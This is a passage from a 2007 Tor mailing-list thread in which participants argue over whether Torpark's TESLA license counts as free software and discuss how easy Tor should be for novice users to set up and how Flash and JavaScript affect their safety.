>> rights.  Anyone  who  falls  under  one of those three definitions who
>> can't consider it free, I'm not concerned about. To _all_ other users,
>> it  is  free  and open source, and they can do what they want with it,
>> and modify and distribute it how they please.
>>
>> The  distinction you are attempting to make is antithetical to security.
>> Somehow I just can't see my way clear to advocating modification of my
>> software  for the use of spyware and commercial competitors. I fail to
>> see  what  legitimate  interest  you  or  anyone  else have in keeping
>> software  from  being  legally  protected  against  having trojans and
>> malware injected into them, and still considering it free.
>>
>> Instead of attacking my usage of free because it causes some cognitive
>> dissonance,  you  may  consider  asking  why  other  licenses  haven't
>> restricted  use  of  their terms from having malware injected into it.
>> Especially  a  project like Tor. Personally, I don't mind if a license
>> causes  a  little  more  confusion  to big brother, xyz proxy corp, or
>> spyware inc, or anyone, if I and my users get more protection. I would
>> certainly like to see that in the Tor license.
>>
>> > So  it's  totally free, except that it isn't. You're also not giving
>> > it  away  to the public, you're only giving it to those parts of the
>> > public you don't discriminate against.
>>
>> No, it is free to the public, we aren't discriminating against who can
>> use it. We ARE restricting how it can be MODIFIED.
>>
>> > ... and the people who currently don't use Torpark because it isn't
>> > free software and the people who don't care about Torpark itself but
>> > would appreciate it if the term "free software" wouldn't be watered
>> > down.
>>
>> Fabian,  if  there  really are legitimate potential users out there in
>> the  cosmos,  waiting  for  me to open it up to malware and trojans so
>> they  can  feel  the  universal  definition of "Free" is consistent to
>> whatever  culture  they happen to be from, they can keep holding their
>> breath.  And  to  the  others  who  don't care enough except to make a
>> pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
>> regarding how they own the trademark "Free".
>>
>> Once  again,  would  anyone else like to see Tor's license add that it
>> can't  be  modified  to  have malware, trojans, spyware, etc. injected
>> into it?
>>
>>
>> Regards,
>> Steve
>>
>>







Re: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread H D Moore
On Sunday 25 March 2007 14:06, Fabian Keil wrote:
> ... and the people who currently don't use Torpark because it isn't
> free software and the people who don't care about Torpark itself but
> would appreciate it if the term "free software" wouldn't be watered
> down.

Watered down? C'mon. Do a Google search for "free software". At least half 
of the results refer to software that is "free as in beer" vs "free as in 
speech". If you want to show the difference between "free" and "Free", 
capitalize it like everyone else. Just because something isn't "Free" 
doesn't mean you have to pay for it.

Speaking of freedom, what about giving a software developer the freedom 
to prevent commercial abuse? Would you prefer to give them the "Freedom" 
to stop working on their software because they don't want it ripped off 
by scumbags?

>Torpark's license just doesn't give the user enough rights to
>call Torpark either free software or open source software
>without causing confusion, raised eyebrows or being laughed at.

I argue that anyone trying to redefine the English word "free" to only 
mean software licensed according to the FSF guidelines deserves to be 
laughed at.

This is a stupid argument to start with -- ignoring the license, TorPark 
should be recommended based on the quality of the code and the features 
of the software. If TorPark LLC does something evil at a later date, stop 
recommending them.

-HD




Re: Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Kasimir Gabert

It would be good if I could read, I am sorry for posting that I saw
the license as free.  Reading through it fully, it definitely is not.

The terms of the license are way too broad.  Trying to exclude malware
and spyware by licensing the program under a license which states that
it cannot be used for anything that restricts the rights of the user
will not work.  First of all, malware does not restrict the rights of
the user.  Second of all, malware doesn't care about licenses, and the
creators of much of the spyware and malware are not known to the
world, so even if they break this license nothing will happen to them.

Another thing that doesn't really make sense to me about the license
is that it restricts the right to modify the program if it uses a
commercial "connectivity service".  I am not a lawyer, but isn't my
ISP a commercial "connectivity service"?  It seems to me that this
program cannot be redistributed at all, because it can only be used
with a commercial "connectivity service", and therefore any
modification will break the license.

I take back what I said earlier, and I am sorry for causing so many
people to stare at their monitor in disbelief from what they just
read.

My most humble apologies,
Kasimir

On 3/25/07, Arrakis <[EMAIL PROTECTED]> wrote:

> Fabian et al,
>
> > The terms "free software" and "open source software" have been
> > around for a while and so has their meaning. No one said Torpark
> > wasn't delivered free of charge or that its source wasn't open for
> > review.
>
> > Torpark's license just doesn't give the user enough rights to
> > call Torpark either free software or open source software
> > without causing confusion, raised eyebrows or being laughed at.
>
> Let  us  not be ambiguous about the "users" you are talking about. The
> specific  "users"  you  are talking about are limited by definition to
> only  be  the ones wanting to modify it to include malware/trojans, or
> someone  trying  to  turn it into a commercial application, or an evil
> government  that  does not abide by the universal declaration of human
> rights.  Anyone  who  falls  under  one of those three definitions who
> can't consider it free, I'm not concerned about. To _all_ other users,
> it  is  free  and open source, and they can do what they want with it,
> and modify and distribute it how they please.
>
> The  distinction you are attempting to make is antithetical to security.
> Somehow I just can't see my way clear to advocating modification of my
> software  for the use of spyware and commercial competitors. I fail to
> see  what  legitimate  interest  you  or  anyone  else have in keeping
> software  from  being  legally  protected  against  having trojans and
> malware injected into them, and still considering it free.
>
> Instead of attacking my usage of free because it causes some cognitive
> dissonance,  you  may  consider  asking  why  other  licenses  haven't
> restricted  use  of  their terms from having malware injected into it.
> Especially  a  project like Tor. Personally, I don't mind if a license
> causes  a  little  more  confusion  to big brother, xyz proxy corp, or
> spyware inc, or anyone, if I and my users get more protection. I would
> certainly like to see that in the Tor license.
>
> > So  it's  totally free, except that it isn't. You're also not giving
> > it  away  to the public, you're only giving it to those parts of the
> > public you don't discriminate against.
>
> No, it is free to the public, we aren't discriminating against who can
> use it. We ARE restricting how it can be MODIFIED.
>
> > ... and the people who currently don't use Torpark because it isn't
> > free software and the people who don't care about Torpark itself but
> > would appreciate it if the term "free software" wouldn't be watered
> > down.
>
> Fabian,  if  there  really are legitimate potential users out there in
> the  cosmos,  waiting  for  me to open it up to malware and trojans so
> they  can  feel  the  universal  definition of "Free" is consistent to
> whatever  culture  they happen to be from, they can keep holding their
> breath.  And  to  the  others  who  don't care enough except to make a
> pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
> regarding how they own the trademark "Free".
>
> Once  again,  would  anyone else like to see Tor's license add that it
> can't  be  modified  to  have malware, trojans, spyware, etc. injected
> into it?
>
>
> Regards,
> Steve





--
Kasimir Gabert


Re[2]: Ultimate solution

2007-03-25 Thread Arrakis
Michael,

Well that sounds good in theory, and admittedly I don't know enough
about scripting languages to say it can't be done. But it does occur
to me that the SM would have to be very intelligent to know that the
harmless X, Y, and Z parts of the script form a dangerous whole. I
think that starts entering into heuristics. Surely someone here knows
way more about this and will comment. I would love to see such a tool.

Regards,
Steve


>> In my experience many users will, and do, go out of their way to
>> circumvent their own protection unless very aware of the consequences,
>> and sometimes even then. If they really want to see that funny Flash
>> animation on a certain site, they will find a way to do it and then
>> often forget to undo the changes they made, thereby leaving themselves
>> vulnerable.

> There are some aspects of Flash, Javascript, etc, that are safe, and
> do not reveal any information. There are other aspects that are
> unsafe.

> This gets back to the whole issue I raised earlier, in another thread.
> Why try to sell people on "OK, but you need to use a completely
> stripped down browser that can't display most modern sites at all
> because all scripting systems are disabled"? Why not use a "security
> manager" model, where the browser commands are verified by a separate
> security manager, configured by the user? Then Tor can just distribute
> a security manager file.

> This would require some sort of system for "I'm the browser, this is
> the file I just downloaded, tell me what I can safely execute". "I'm
> the javascript parser, this is what I've just parsed and written via
> document.write but not yet executed. Tell me what I can safely
> execute". "I'm the browser, this is the full document after fetching
> all the embedded references. I know I've asked you on each of those
> parts separately, now here's the whole shebang. Tell me what I can
> safely execute." Etc.

> The whole "Because some aspect of Flash can kill you, all of flash
> must be junked" approach won't work. That's like saying, "Because Java
> could contain an unsafe program, no Java can be used". Sun designed a
> security manager system into Java specifically to deal with that
> concern. If the default security manager isn't good enough -- if the
> default SM permits unproxied connections, for example -- then we need
> a new SM that does not permit unproxied connections, or forces them to
> become proxied without the code realizing it.

> Java does permit changing the SM, doesn't it?

> Why not implement one for the rest of the browsing experience?




Re[2]: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Arrakis
Fabian et al,

> The terms "free software" and "open source software" have been
> around for a while and so has their meaning. No one said Torpark
> wasn't delivered free of charge or that its source wasn't open for
> review.

> Torpark's license just doesn't give the user enough rights to
> call Torpark either free software or open source software
> without causing confusion, raised eyebrows or being laughed at.

Let  us  not be ambiguous about the "users" you are talking about. The
specific  "users"  you  are talking about are limited by definition to
only  be  the ones wanting to modify it to include malware/trojans, or
someone  trying  to  turn it into a commercial application, or an evil
government  that  does not abide by the universal declaration of human
rights.  Anyone  who  falls  under  one of those three definitions who
can't consider it free, I'm not concerned about. To _all_ other users,
it  is  free  and open source, and they can do what they want with it,
and modify and distribute it how they please.

The  distinction you are attempting to make is antithetical to security.
Somehow I just can't see my way clear to advocating modification of my
software  for the use of spyware and commercial competitors. I fail to
see  what  legitimate  interest  you  or  anyone  else have in keeping
software  from  being  legally  protected  against  having trojans and
malware injected into them, and still considering it free.

Instead of attacking my usage of free because it causes some cognitive
dissonance,  you  may  consider  asking  why  other  licenses  haven't
restricted  use  of  their terms from having malware injected into it.
Especially  a  project like Tor. Personally, I don't mind if a license
causes  a  little  more  confusion  to big brother, xyz proxy corp, or
spyware inc, or anyone, if I and my users get more protection. I would
certainly like to see that in the Tor license.

> So  it's  totally free, except that it isn't. You're also not giving
> it  away  to the public, you're only giving it to those parts of the
> public you don't discriminate against.

No, it is free to the public, we aren't discriminating against who can
use it. We ARE restricting how it can be MODIFIED.

> ... and the people who currently don't use Torpark because it isn't
> free software and the people who don't care about Torpark itself but
> would appreciate it if the term "free software" wouldn't be watered
> down.

Fabian,  if  there  really are legitimate potential users out there in
the  cosmos,  waiting  for  me to open it up to malware and trojans so
they  can  feel  the  universal  definition of "Free" is consistent to
whatever  culture  they happen to be from, they can keep holding their
breath.  And  to  the  others  who  don't care enough except to make a
pedantic  distinction,  I'll  be  expecting  a  letter  from  the  FSF
regarding how they own the trademark "Free".

Once  again,  would  anyone else like to see Tor's license add that it
can't  be  modified  to  have malware, trojans, spyware, etc. injected
into it?


Regards,
Steve



Re: Ultimate solution

2007-03-25 Thread Michael_google gmail_Gersten

> In my experience many users will, and do, go out of their way to
> circumvent their own protection unless very aware of the consequences,
> and sometimes even then. If they really want to see that funny Flash
> animation on a certain site, they will find a way to do it and then
> often forget to undo the changes they made, thereby leaving themselves
> vulnerable.


There are some aspects of Flash, Javascript, etc, that are safe, and
do not reveal any information. There are other aspects that are
unsafe.

This gets back to the whole issue I raised earlier, in another thread.
Why try to sell people on "OK, but you need to use a completely
stripped down browser that can't display most modern sites at all
because all scripting systems are disabled"? Why not use a "security
manager" model, where the browser commands are verified by a separate
security manager, configured by the user? Then Tor can just distribute
a security manager file.

This would require some sort of system for "I'm the browser, this is
the file I just downloaded, tell me what I can safely execute". "I'm
the javascript parser, this is what I've just parsed and written via
document.write but not yet executed. Tell me what I can safely
execute". "I'm the browser, this is the full document after fetching
all the embedded references. I know I've asked you on each of those
parts separately, now here's the whole shebang. Tell me what I can
safely execute." Etc.

The whole "Because some aspect of Flash can kill you, all of flash
must be junked" approach won't work. That's like saying, "Because Java
could contain an unsafe program, no Java can be used". Sun designed a
security manager system into Java specifically to deal with that
concern. If the default security manager isn't good enough -- if the
default SM permits unproxied connections, for example -- then we need
a new SM that does not permit unproxied connections, or forces them to
become proxied without the code realizing it.

Java does permit changing the SM, doesn't it?

Why not implement one for the rest of the browsing experience?


Re: Free Software and Torpark (was: Ultimate solution)

2007-03-25 Thread Fabian Keil
Arrakis <[EMAIL PROTECTED]> wrote:

> Saying free and open-source software isn't "Free" and "Open Source" is
> giving  in to a combination of semantics and snobbery of licensing.

The terms "free software" and "open source software" have been
around for a while and so has their meaning. No one said Torpark
wasn't delivered free of charge or that its source wasn't open for
review.

Torpark's license just doesn't give the user enough rights to
call Torpark either free software or open source software
without causing confusion, raised eyebrows or being laughed at.

> The source is totally free, and that isn't "Free" but free, _except_ I
> don't allow for other commercial services to rip it off and use it for
> their  personal  gain since I am giving it away to the public, and you
> can't install tracking/spyware/malware in it and then redistribute it.

So it's totally free, except that it isn't. You're also not giving it
away to the public, you're only giving it to those parts of the
public you don't discriminate against.

> Those  are  pretty  much  the  only restrictions. Perhaps GPL fanatics
> think  I  owe  it  to spyware manufacturers, or I need to give away my
> intellectual  property to every 3rd-rate commercial anonymity service?
> The  bottom  line  is, everyone benefits by these restrictions, except
> for malware manufacturers and commercial anonymity services.

... and the people who currently don't use Torpark because it isn't
free software and the people who don't care about Torpark itself but
would appreciate it if the term "free software" wouldn't be watered
down.

Fabian




Re: Re[2]: Ultimate solution

2007-03-25 Thread H D Moore
Correct URL is:
 - http://metasploit.com/confs/fosdem2007/economics.pdf

-HD

On Sunday 25 March 2007 11:42, H D Moore wrote:
> Sometimes, a "less free" license is required to keep your developers
> happy. I wrote up some slides about this (as it relates to security
> software):
>
> http://metasploit.com/confs/fosdem/economics.pdf


Re: Re[2]: Ultimate solution

2007-03-25 Thread H D Moore
This non-commercial clause prevents it from being "Free" and "Open" as the 
OSI and FSF define it. Metasploit 3 has a similar license. TorPark is 
still "free" as in beer, it's just not "Free" as in speech. You can 
grumble all you like about it, but at the end of the day, it's still their 
time and effort going into the project.

Sometimes, a "less free" license is required to keep your developers 
happy. I wrote up some slides about this (as it relates to security 
software):

http://metasploit.com/confs/fosdem/economics.pdf

-HD

On Sunday 25 March 2007 10:26, Kasimir Gabert wrote:
> · So long as You do not subvert or infringe the freedoms of end-users
> by doing so, You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.


Re: Ultimate solution

2007-03-25 Thread Andrew Del Vecchio

Guys, if you're that paranoid, why not insist on the BSD license? If
the man wrote the code himself, it's his prerogative to choose the
terms. You may not like them, but ultimately it's his choice, not
yours, since he wrote the code. I prefer the GPL myself, and use it
for everything I do (also FDL and/or CC for written works). Point of
info: is Kasimir Gabert the owner of Torrify, LLC? If so, I would very
much like to ask him about an important legal question, not related to
this particular discussion.

Thanks,
Andrew

- ---

Frivolous lawsuits. Unlawful government seizures. What's YOUR defense?
Protect your assets, keep what you earn, and generate more income at the
same time!
Visit http://www.mpassetprotection.com/ today.




On 03/25/2007 10:56 AM, Arrakis wrote:
> Nick,
>
> You  are  right.  We  don't allow governments to subvert our
> software, commercial competitors, or people to install spyware and
> redistribute it that way.
>
> Saying free and open-source software isn't "Free" and "Open Source"
> is giving  in to a combination of semantics and snobbery of
> licensing. It isn't  as  though  any  organization owns the
> definition of "Free" and "Open  Source"  and has the authority to
> pin it down to their specific hoops we must jump through, nor
> should anyone assume we have.
>
> The source is totally free, and that isn't "Free" but free,
> _except_ I don't allow for other commercial services to rip it off
> and use it for their  personal  gain since I am giving it away to
> the public, and you can't install tracking/spyware/malware in it
> and then redistribute it. Those  are  pretty  much  the  only
> restrictions. Perhaps GPL fanatics think  I  owe  it  to spyware
> manufacturers, or I need to give away my intellectual  property to
> every 3rd-rate commercial anonymity service? The  bottom  line  is,
> everyone benefits by these restrictions, except for malware
> manufacturers and commercial anonymity services.
>
>> I'm no lawyer, but the term in the license above seems like a
>> clear violation of the Debian Free Software Guidelines to me.
>
> I think your software is a pretty clear violation of the TESLA
> license because you specifically allow spyware and malware to be
> inserted into your  software due to your licensing terms, but then
> again, you didn't release  yours  under TESLA, and nor am I
> required to conform to DFSG. Because  I've seen the light of an
> ethical software license agreement, I  no  longer give much
> credence to "Open-Source" definition or "Free" according to Hoyle
> or DFSG.
>
> But it definitely is a balance that must be struck. Tor probably
> has a good license, even if it isn't 3 clause BSD, because it is
> straight up difficult  to  use  for  the average user. But Torpark
> is too easy for conforming  to those definitions, because with
> convenience it makes it a  little  too  easy  for  malware and
> snoopers to reach users because users no longer have to have a
> technical understanding or perform due diligence  on  their
> software, so we have to provide some protection for them. The TESLA
> license is just that.
>
> To be quite clear, I am enamoured by the HESSLA.
> http://www.hacktivismo.com/about/hessla.php
>
> Regards, Steve
>
>
>
>
>
>



Re[4]: Ultimate solution

2007-03-25 Thread Arrakis
Nick,

You  are  right.  We  don't allow governments to subvert our software,
commercial competitors, or people to install spyware and redistribute
it that way.

Saying free and open-source software isn't "Free" and "Open Source" is
giving  in to a combination of semantics and snobbery of licensing. It
isn't  as  though  any  organization owns the definition of "Free" and
"Open  Source"  and has the authority to pin it down to their specific
hoops we must jump through, nor should anyone assume we have.

The source is totally free, and that isn't "Free" but free, _except_ I
don't allow for other commercial services to rip it off and use it for
their  personal  gain since I am giving it away to the public, and you
can't install tracking/spyware/malware in it and then redistribute it.
Those  are  pretty  much  the  only restrictions. Perhaps GPL fanatics
think  I  owe  it  to spyware manufacturers, or I need to give away my
intellectual  property to every 3rd-rate commercial anonymity service?
The  bottom  line  is, everyone benefits by these restrictions, except
for malware manufacturers and commercial anonymity services.

> I'm no lawyer, but the term in the license above seems like a clear
> violation of the Debian Free Software Guidelines to me.

I think your software is a pretty clear violation of the TESLA license
because you specifically allow spyware and malware to be inserted into
your  software due to your licensing terms, but then again, you didn't
release  yours  under TESLA, and nor am I required to conform to DFSG.
Because  I've seen the light of an ethical software license agreement,
I  no  longer give much credence to "Open-Source" definition or "Free"
according to Hoyle or DFSG.

But it definitely is a balance that must be struck. Tor probably has a
good license, even if it isn't 3 clause BSD, because it is straight up
difficult  to  use  for  the average user. But Torpark is too easy for
conforming  to those definitions, because with convenience it makes it
a  little  too  easy  for  malware and snoopers to reach users because
users no longer have to have a technical understanding or perform due
diligence  on  their  software, so we have to provide some protection
for them. The TESLA license is just that.

To be quite clear, I am enamoured by the HESSLA.
http://www.hacktivismo.com/about/hessla.php

Regards,
Steve





Re: Re[2]: Ultimate solution

2007-03-25 Thread Nick Mathewson
On Sun, Mar 25, 2007 at 09:26:09AM -0600, Kasimir Gabert wrote:
 [...]
> 
> · So long as You do not subvert or infringe the freedoms of end-users
> by doing so, You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.
  [...]
> 
> Sounds rather free to me...

When free software people ask "is a license free?" they usually are
asking whether it conforms to the Debian Free Software Guidelines or
the Open Source Definition.

I'm no lawyer, but the term in the license above seems like a clear
violation of the Debian Free Software Guidelines to me.  In
particular, it violates guideline 5 ("No Discrimination Against
Persons or Groups") and possibly guideline 6 ("No Discrimination
Against Fields of Endeavor").  The restriction on what you can modify
it to do seems to controvert guideline 2 ("Derived Works").  These
same requirements appear in the Open Source Definition.  Thus, the
license is neither a Free Software license nor an Open Source license,
unless you mean free-as-in-beer.

I won't touch on the other issues here.

cheers,
-- 
Nick




Re: Re[2]: Ultimate solution

2007-03-25 Thread Drake Wilson
Quoth Kasimir Gabert <[EMAIL PROTECTED]>, on 2007-03-25 09:26:09 -0600:
[quoting another level]
> · So long as You do not subvert or infringe the freedoms of end-users
> by doing so,

Who determines what qualifies as "subverting or infringing the
freedoms of end-users"?

> You have the freedom to change the software or to use
> parts of it in new Programs; However, these softwares are not allowed
> to be modified to use any commercial proxy or connectivity service or
> product other than those offered by Torrify LLC or the Tor Project,
> without written permission of Torrify LLC.

And this is, I gather, derived from the idea of "you may not start up
a competing service using a modified version of this software".  I
will remain deliberately silent on the question of whether this is
justified, but nonetheless, that clause is non-free in the extreme.

So no, if the above clauses are part of the license in the context in
which they were indicated in the previous message, then Torpark is not
free software.

   ---> Drake Wilson




Re: Re[2]: Ultimate solution

2007-03-25 Thread Kasimir Gabert

http://update.torrify.com/distro/torpark/Torpark_latest.zip

http://www.torrify.com/tesla.html
===
· You have the freedom to distribute unmodified copies of the software
(and charge for this service if You wish);

· You have the freedom of access to the source code, to inspect and
verify (and even to improve, if You can) the integrity and
functionality of the software;

· So long as You do not subvert or infringe the freedoms of end-users
by doing so, You have the freedom to change the software or to use
parts of it in new Programs; However, these softwares are not allowed
to be modified to use any commercial proxy or connectivity service or
product other than those offered by Torrify LLC or the Tor Project,
without written permission of Torrify LLC.

· You have the freedom to know You can do these things.
===

Sounds rather free to me...

Kasimir

On 3/25/07, Koh Choon Lin <[EMAIL PROTECTED]> wrote:

> 2) Torpark is not commercial, it is totally free and open source.

> And lastly, TORPARK IS FREE. It just isn't released under the GPL, it
> is released under the TESLA license, which is similar to the HESSLA
> license. Because of the way it is written, the GPL can have malware inserted;
> the TESLA makes it a legally actionable violation if malware is inserted.

Torpark is not free software.




--
Kasimir Gabert


Re: Re[2]: Ultimate solution

2007-03-25 Thread Koh Choon Lin

2) Torpark is not commercial, it is totally free and open source.



And lastly, TORPARK IS FREE. It just isn't released under the GPL, it
is released under the TESLA license, which is similar to the HESSLA
license. Because of the way it is written, the GPL can have malware inserted;
the TESLA makes it a legally actionable violation if malware is inserted.


Torpark is not free software.


Re[2]: Ultimate solution

2007-03-25 Thread Arrakis
JT,

I wrote Torpark, so let me respond to your points.

1) Torpark is only for windows at the moment, it will be available for
Mac and Linux shortly.

2) Torpark is not commercial, it is totally free and open source. We
simply offer an upgrade to get higher speeds than the tor network can
provide.

3) The fact that trust isn't distributed is a positive, not a
negative, because you don't have to trust everyone with your outgoing
plaintext traffic. We have independent security auditors make sure our
admins are not tracking anyone or doing anything malicious. However,
we are using distributed trust internally, so if anyone comes asking
for customer info, they won't get it without NSA letters to all our
associates in all our jurisdictions. And naturally, we don't have any
records of free Torpark users anyway.

4) The online tutorial is only a video for streaming. Perhaps you
would prefer to download the 25mb file directly? Or perhaps you know
of a way to stream video without using scripting? I'll be happy to
listen.

5) Offshore from the USA, UK, etc. We have servers in Germany,
Malaysia, and some other hidden places. Currently none in the USA or
UK, etc. Unfortunately, it is better not to tell you specifically
where they are, because that makes it much harder for agencies to
attempt a subpoena/court order. If they are guessing jurisdictions,
we are all happier. Bottom line is: place faith in audits. Further,
Torrify is formed as an offshore corp in the country of Saint Kitts,
so it is not subject to US laws, only those of the UK Commonwealth and the
UN.

6) http://www.hacktivismo.com

Regarding commercial anonymity, you will eventually realize that it is
the only way to go for high speed and low latency, otherwise the
network will be abused and suffer the tragedy of the commons.

Further, the browser is entirely capable of having no flash, java,
javascript, plugins, and all of those are blocked by default.

And lastly, TORPARK IS FREE. It just isn't released under the GPL, it
is released under the TESLA license, which is similar to the HESSLA
license. Because of the way it is written, the GPL can have malware inserted;
the TESLA makes it a legally actionable violation if malware is inserted.
With such a sensitive project, I insist that people are not legally able
to abuse it.

http://www.torrify.com/tesla.html

Regards,

Steve Topletz




Re: Ultimate solution

2007-03-24 Thread phobos
On Sat, Mar 24, 2007 at 08:03:08AM +, [EMAIL PROTECTED] wrote 1.4K bytes in 
39 lines about:
: I am told that my router is a firewall. There are also
: Windows' own firewall and other commercial 'total
: protection suites'. I know what gnats are but not what
: a NAT is. And please, how do I 'punch a hole' in any
: of them?

See, that's my point.  Tor can only do so much.  Figuring out
how to change your firewalls, NATs, 'total protection suites',
and routers is nearly impossible.  There are things we would
like to do to make Tor easier to be a point-click-server.  There
are things we'd like to not have to do to be a
point-click-server.  One of these is magically be able to
auto-configure every operating system, network, firewall, 'total
protection suite', and router.  Yes, that's both the "we'd like
to do it" and "we'd like not to do it".
: 
: So why should java and javascript be a problem?

Regardless of OS, this FAQ answer is valid:
http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#TotallyAnonymous


: Trying to help case by case will likely take up an
: unacceptable amount of the developers' time.
: Efficiency  lies in standardisation and mass
: production. So Mr Freemor, I concur with you on the

Yes, standardization is great.  And the great thing about
standardization in the world is there are so many standards from
which to choose.  The Tor client is pretty much mass produced
and easy to use.  We continue to work on the server end, but the
realities of passing traffic keep getting in the way.

I hear the collective frustration and desire for a point-click-server
solution.  Help us work on solutions.

As for your specific case, sy_c16, we're happy to help you out
in getting a server running.

-- 
Andrew


Re: Ultimate solution

2007-03-24 Thread Freemor
On Fri, 2007-23-03 at 22:04 -0700, Andrew Del Vecchio wrote:
> Freemor,
> What if it was done in a way that educates and informs users, such
> as how Bastille Linux works? Someone could probably easily create an
> installer/GUI config program that teaches the user about network
> security as he uses it. I'm no coder, but I understand a good feature
> when I see it! This may be why I sometimes act as a buffer between
> clients and the techies that can't easily relate to 'noobs'. What do
> you like about this idea?
> 
> Gracias,
> Andrew
> 

That may be a workable model, and I definitely like the educational side
of it. My concern is how it would intercept errors the user was making
in non-TOR applications (i.e. warn them that logging into a non-https
site may leak their password, etc.). There are now several viable
browsers that users could choose to use with TOR, and I think it would be
difficult to make an application such as the one you suggest able to
intercept all the various gaffes.

  In my experience many users will, and do, go out of their way to
circumvent their own protection unless very aware of the consequences,
and sometimes even then. If they really want to see that funny flash
animation on a certain site, they will find a way to do it and then
often forget to undo the changes they made, thereby leaving themselves
vulnerable.

  I'm not saying it's not do-able, I'm just not sure how one could
implement it given all the various browser, plug-in, etc. combinations
that will get thrown at it.

Freemor
 



--

Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG






Re: Ultimate solution

2007-03-24 Thread Freemor
On Sat, 2007-24-03 at 08:52 -0400, Paul Syverson wrote:
> On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> > 
> > P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> > That just snuck in there as I deal with computer security regularly and
> > often see the same "the computer/internet/isp/mysterious someone" should
> > take care of that for me mentality.   
> > 
> 
> I don't understand this statement. Tor was researched and developed
> by and for the US DoD as an onion routing project, the explicit purpose
> of which is security for DoD and other communications:
> traffic analysis resistance, DoS resistance, personnel protection,
> etc.
> 
> -Paul

I can see your point, and TOR does have some security applications if
used properly and with those goals in mind (i.e. only connecting to
https or other encrypted endpoints). The main goal of TOR is clearly
anonymity. If the main goal was security, having data leave the exit
nodes in the clear would be a definite no-no. I was also just being
clear that I did not think of TOR as a
firewall/antivirus/anti-malware/etc. system when I used the term
Security.

Freemor

--

Freemor <[EMAIL PROTECTED]>

This e-mail has been digitally signed with GnuPG






Re: Ultimate solution

2007-03-24 Thread Paul Syverson
On Sat, Mar 24, 2007 at 12:50:15AM -0400, Freemor wrote:
> 
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.   
> 

I don't understand this statement. Tor was researched and developed
by and for the US DoD as an onion routing project, the explicit purpose
of which is security for DoD and other communications:
traffic analysis resistance, DoS resistance, personnel protection,
etc.

-Paul


Re: Ultimate solution

2007-03-24 Thread sy16
Dear Mr phobos, I know just enough to enable logging,
and I can see there is something called UPNP disabled.
Right. But I didn't do it. Where is it, and should I
turn it on?

I am told that my router is a firewall. There are also
Windows' own firewall and other commercial 'total
protection suites'. I know what gnats are but not what
a NAT is. And please, how do I 'punch a hole' in any
of them?

I did use Vidalia. No success in my log. For my Linux
box, lotsa handshakes, onion skins, 3 cells, 6 cells,
a child wants to read, another wants to write, more
handshakes, then warning failure orport not reachable.

OT, I have a linux box because I am so fed up with
being hacked and remote-administered, and Debian said
nothing could be installed without my root password -
I hope I understood this much correctly?

So why should java and javascript be a problem?

Trying to help case by case will likely take up an
unacceptable amount of the developers' time.
Efficiency lies in standardisation and mass
production. So Mr Freemor, I concur with you on the
need for user education. I absolutely agree with Mr
Del Vecchio about making the process as painless as
possible.

Clement







Re: Ultimate solution

2007-03-23 Thread Tin Tin

1) Torpark is only for windows
2) Torpark is commercial
3) no distributed trust
4) they want you to install flash player for an online tutorial
5) stuck up marketing people say it is offshore. offshore from what?
antarctica?
6) they advertise that Torpark was developed by Hackers. a statement
like that attracts the wrong people

I don't believe in commercial anonymity solutions.


Why don't we create a petition or something like it to the developers of
Torpark to release it as free (GPLed) software?


Re: Ultimate solution

2007-03-23 Thread Andrew Del Vecchio

Freemor,
What if it was done in a way that educates and informs users, such
as how Bastille Linux works? Someone could probably easily create an
installer/GUI config program that teaches the user about network
security as he uses it. I'm no coder, but I understand a good feature
when I see it! This may be why I sometimes act as a buffer between
clients and the techies that can't easily relate to 'noobs'. What do
you like about this idea?

Gracias,
Andrew

- ---

Frivolous lawsuits. Unlawful government seizures. What's YOUR defense?
Protect your assets, keep what you earn, and generate more income at the
same time!
Visit http://www.mpassetprotection.com/ today.




On 03/23/2007 09:50 PM, Freemor wrote:
>   I've been watching this thread with some interest and just wanted to
> add my view to the discussion. I think there is a real danger in making
> TOR too easy. Yes, I do understand that Microsoft and others have
> created a world of people that want every program to function completely
> with 3 clicks. For some applications this is a laudable goal.
>
>   However, when one is dealing with a program that deals with security
> or anonymity I think it is important that people who intend to use the
> program take the time and effort to learn. They need to learn what it
> does, what it doesn't do, how it does it, how it is circumvented, how to
> check if it is working correctly, etc. One of the major reasons there is
> so much tracking of personal data on the web is most users' lack of
> responsibility for their own privacy and security.
>
>   For these reasons, my concern is that making TOR a 3 click wonder will
> not only further propagate this "some one else will worry about my
> privacy/security for me" thinking and ultimately would lead people to a
> false sense of security because they won't properly understand the TOR
> network, and will blissfully find ways to make their computer leak more
> than a bucket with no bottom, all the while thinking "oh, it's fine,
> I've got TOR on, I can see the icon in the systray right there".
>
>   I feel that rather than head down the 3 click wonder path, it would be
> better to invest time in reminding users that we are talking about their
> security, or their anonymity, that as such it is their responsibility,
> and decidedly worth the time to learn as much as possible about the
> programs or systems they use to protect it.
>
>   I would hate to see the day when the TOR team has to waste countless
> hours and resources to battle complaints that "TOR failed to protect me
> when I ".
>
> Just my thoughts on the subject
>
> Freemor
>
> P.s. to the tor Dev's -- Yes, I know TOR is not a security application.
> That just snuck in there as I deal with computer security regularly and
> often see the same "the computer/internet/isp/mysterious someone" should
> take care of that for me mentality.  
>
>



Re: Ultimate solution

2007-03-23 Thread Freemor
  I've been watching this thread with some interest and just wanted to
add my view to the discussion. I think there is a real danger in making
TOR too easy. Yes, I do understand that Microsoft and others have
created a world of people that want every program to function completely
with 3 clicks. For some applications this is a laudable goal. 

  However, when one is dealing with a program that deals with security
or anonymity I think it is important that people who intend to use the
program take the time and effort to learn. They need to learn what it
